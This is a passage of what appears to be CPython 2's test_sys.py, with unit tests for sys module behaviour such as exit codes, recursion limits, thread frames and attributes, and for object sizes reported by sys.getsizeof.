self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (repr(stderr), repr(expected)))
# test that stderr buffer if flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
if hasattr(sys, "getwindowsversion"):
v = sys.getwindowsversion()
self.assert_(isinstance(v, tuple))
self.assertEqual(len(v), 5)
self.assert_(isinstance(v[0], int))
self.assert_(isinstance(v[1], int))
self.assert_(isinstance(v[2], int))
self.assert_(isinstance(v[3], int))
self.assert_(isinstance(v[4], str))
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assert_(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assert_(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assert_(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assert_(main_id in d)
self.assert_(thread_id in d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assert_(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assert_(sourceline in ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assert_(0 in d)
self.assert_(d[0] is sys._getframe())
def test_attributes(self):
self.assert_(isinstance(sys.api_version, int))
self.assert_(isinstance(sys.argv, list))
self.assert_(sys.byteorder in ("little", "big"))
self.assert_(isinstance(sys.builtin_module_names, tuple))
self.assert_(isinstance(sys.copyright, basestring))
self.assert_(isinstance(sys.exec_prefix, basestring))
self.assert_(isinstance(sys.executable, basestring))
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assert_(isinstance(sys.hexversion, int))
self.assert_(isinstance(sys.maxint, int))
if test.test_support.have_unicode:
self.assert_(isinstance(sys.maxunicode, int))
self.assert_(isinstance(sys.platform, basestring))
self.assert_(isinstance(sys.prefix, basestring))
self.assert_(isinstance(sys.version, basestring))
vi = sys.version_info
self.assert_(isinstance(vi, tuple))
self.assertEqual(len(vi), 5)
self.assert_(isinstance(vi[0], int))
self.assert_(isinstance(vi[1], int))
self.assert_(isinstance(vi[2], int))
self.assert_(vi[3] in ("alpha", "beta", "candidate", "final"))
self.assert_(isinstance(vi[4], int))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
self.assert_(sys.__stdout__.encoding == sys.__stderr__.encoding)
def test_sys_flags(self):
self.failUnless(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning")
for attr in attrs:
self.assert_(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assert_(repr(sys.flags))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess,os
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.stdout.read().strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to an non existent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assert_(executable in ["''", repr(sys.executable)], executable)
class SizeofTest(unittest.TestCase):
TPFLAGS_HAVE_GC = 1<<14
TPFLAGS_HEAPTYPE = 1L<<9
def setUp(self):
self.c = len(struct.pack('c', ' '))
self.H = len(struct.pack('H', 0))
self.i = len(struct.pack('i', 0))
self.l = len(struct.pack('l', 0))
self.P = len(struct.pack('P', 0))
# due to missing size_t information from struct, it is assumed that
# sizeof(Py_ssize_t) = sizeof(void*)
self.header = 'PP'
self.vheader = self.header + 'P'
if hasattr(sys, "gettotalrefcount"):
self.header += '2P'
self.vheader += '2P'
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.test_support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.test_support.unlink(test.test_support.TESTFN)
def check_sizeof(self, o, size):
result = sys.getsizeof(o)
if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
size += self.gc_headsize
msg = 'wrong size for %s: got %d, expected %d' \
% (type(o), result, size)
self.assertEqual(result, size, msg)
def calcsize(self, fmt):
"""Wrapper around struct.calcsize which enforces the alignment of the
end of a structure to the alignment requirement of pointer.
Note: This wrapper should only be used if a pointer member is included
and no member with a size larger than a pointer exists.
"""
return struct.calcsize(fmt + '0P')
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
h = self.header
size = self.calcsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size(h + 'l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size(h + 'P PP') + gc_header_size)
def test_default(self):
h = self.header
size = self.calcsize
self.assertEqual(sys.getsizeof(True, -1), size(h + 'l'))
def test_objecttypes(self):
# check all types defined in Objects/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# bool
check(True, size(h + 'l'))
# buffer
with test.test_support._check_py3k_warnings():
check(buffer(''), size(h + '2P2Pil'))
# builtin_function_or_method
check(len, size(h + '3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
# bytearray_iterator
check(iter(bytearray()), size(h + 'PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size(h + 'P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size(h + '6P'))
# instance (old-style class)
check(class_oldstyle(), size(h + '3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size(h + '4P'))
# complex
check(complex(0,1), size(h + '2d'))
# code
check(get_cell().func_code, size(h + '4i8Pi2P'))
# BaseException
check(BaseException(), size(h + '3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size(h + '5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size(h + '5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size(h + '2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size(h + '2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size(h + '2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size(h + '2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size(h + 'P'))
# method-wrapper (descriptor object)
check({}.__iter__, size(h + '2P'))
# dict
check({}, size(h + '3P2P' + 8*'P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
# dictionary-keyiterator
check({}.iterkeys(), size(h + 'P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size(h + 'P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size(h + 'P2PPP'))
# ellipses
check(Ellipsis, size(h + ''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size(h + '32B2iB'))
# enumerate
check(enumerate([]), size(h + 'l3P'))
# file
check(self.file, size(h + '4P2i4P3i3P3i'))
# float
check(float(0), size(h + 'd'))
# sys.floatinfo
check(sys.float_info, size(vh) + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size(h + '9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size(h + 'P'))
# classmethod
check(bar, size(h + 'P'))
# generator
def get_gen(): yield 1
check(get_gen(), size(h + 'Pi2P'))
# integer
check(1, size(h + 'l'))
check(100, size(h + 'l'))
# iterator
check(iter('abc'), size(h + 'lP'))
# callable-iterator
import re
check(re.finditer('',''), size(h + '2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, size(vh + 'PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size(h + 'lP'))
# listreverseiterator (list)
check(reversed([]), size(h + 'lP'))
# long
check(0L, size(vh + 'H') - self.H)
check(1L, size(vh + 'H'))
check(-1L, size(vh + 'H'))
check(32768L, size(vh + 'H') + self.H)
check(32768L*32768L-1, size(vh + 'H') + self.H)
check(32768L*32768L, size(vh + 'H') + 2*self.H)
# module
check(unittest, size(h + 'P'))
# None
check(None, size(h + ''))
# object
check(object(), size(h + ''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size(h + '4Pi'))
# PyCObject
# XXX
# rangeiterator
check(iter(xrange(1)), size(h + '4l'))
# reverse
check(reversed(''), size(h + 'PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('lP'))
check(frozenset(sample), s + newsize*struct.calcsize('lP'))
# setiterator
check(iter(set()), size(h + 'P3P'))
# slice
check(slice(1), size(h + '3P'))
# str
check('', size(vh + 'lic'))
check('abc', size(vh + 'lic') + 3*self.c)
# super
check(super(int), size(h + '3P'))
# tuple
check((), size(vh))
check((1,2,3), size(vh) + 3*self.P)
# tupleiterator
check(iter(()), size(h + 'lP'))
# type
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs)
s = size(vh + 'P2P15Pl4PP9PP11PI') + size('41P 10P 3P 6P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size(h + 'PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size(h + '2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size(h + '2Pl2P'))
# xrange
check(xrange(1), size(h + '3l'))
check(xrange(66000), size(h + '3l'))
def test_pythontypes(self):
# check all types defined in Python/
h = self.header
vh = self.vheader
size = self.calcsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(h + ''))
# imp.NullImporter
import imp
check(imp.NullImporter(self.file.name), size(h + ''))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size(h + '2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.